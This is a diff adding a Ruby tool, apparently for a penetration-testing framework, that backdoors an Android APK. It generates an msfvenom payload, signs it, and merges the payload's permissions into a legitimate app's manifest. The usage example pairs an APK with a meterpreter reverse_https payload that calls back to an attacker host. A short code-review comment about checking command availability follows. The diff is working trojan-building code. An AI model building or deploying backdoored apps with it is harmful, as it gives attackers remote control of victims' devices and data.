tools/apk_backdoor.rb

```diff
@@ -0,0 +1,232 @@
+end
+
+def fix_manifest()
+	payload_permissions=[]
+	
+	#Load payload's permissions
+	File.open("payload/AndroidManifest.xml","r"){|file|
+		k=File.read(file)
+		payload_manifest=Nokogiri::XML(k)
+		permissions = payload_manifest.xpath("//manifest/uses-permission")
+		for permission in permissions
+			name=permission.attribute("name")
+			payload_permissions << name.to_s
+		end
+	#	print "#{k}"
+	}
+	original_permissions=[]
+	apk_mani=''
+	
+	#Load original apk's permissions
+	File.open("original/AndroidManifest.xml","r"){|file2|
+		k=File.read(file2)
+		apk_mani=k
+		original_manifest=Nokogiri::XML(k)
+		permissions = original_manifest.xpath("//manifest/uses-permission")
+		for permission in permissions
+			name=permission.attribute("name")
+			original_permissions << name.to_s
+		end
+	#	print "#{k}"
+	}
+	#Get permissions that are not in original APK
+	add_permissions=[]
+	for permission in payload_permissions
+		if !(original_permissions.include? permission)
+			print "[*] Adding #{permission}\n"
+			add_permissions << permission
+		end
+	end
+	inject=0
+	new_mani=""
+	#Inject permissions in original APK's manifest
+	for line in apk_mani.split("\n")
+		if (line.include? "uses-permission" and inject==0)
+			for permission in add_permissions
+				new_mani << '<uses-permission android:name="'+permission+'"/>'+"\n"
+			end
+			new_mani << line+"\n"
+			inject=1
+		else
+			new_mani << line+"\n"
+		end
+	end
+	File.open("original/AndroidManifest.xml", "w") {|file| file.puts new_mani }
+end
+
+apkfile = ARGV[0]
+unless(apkfile && File.readable?(apkfile))
+	puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
+	puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
+	exit(1)
+end
+
+jarsigner = `which jarsigner`
+unless(jarsigner && jarsigner.length > 0)
+	puts "[-] Jarsigner not found. If it's not in your PATH, please add it.\n"
+	exit(1)
+end
+
+apktool = `which apktool`
+unless(apktool && apktool.length > 0)
+	puts "[-] APKTool not found. If it's not in your PATH, please add it.\n"
+	exit(1)
+end
+
+apk_v=`apktool`
+unless(apk_v.split()[1].include?("v2."))
+	puts "[-] Apktool version #{apk_v} not supported, please download the latest 2.xx version from git.\n"
+	exit(1)
+end
+
+begin
+	msfvenom_opts = ARGV[1,ARGV.length]
+	opts=""
+	msfvenom_opts.each{|x|
+	opts+=x
+	opts+=" "
+	}
+rescue
+	puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
+	puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
+	puts "[-] Error parsing msfvenom options. Exiting.\n"
+	exit(1)
+end
+
+
+
+print "[*] Generating msfvenom payload..\n"
+res=`msfvenom -f raw #{opts} -o payload.apk 2>&1`
+if res.downcase.include?("invalid" || "error")
+	puts res
+	exit(1)
+end
+
+print "[*] Signing payload..\n"
+`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey`
+
+`rm -rf original`
```

Comment:
Instead of using 'which', which will also fail on Windows, you can also use system to tell if the command is available (it will return nil), e.g.:

```
irb(main):003:0> system('false')
=> false
irb(main):004:0> system('true')
=> true
irb(main):005:0> system('monkey')
=> nil
```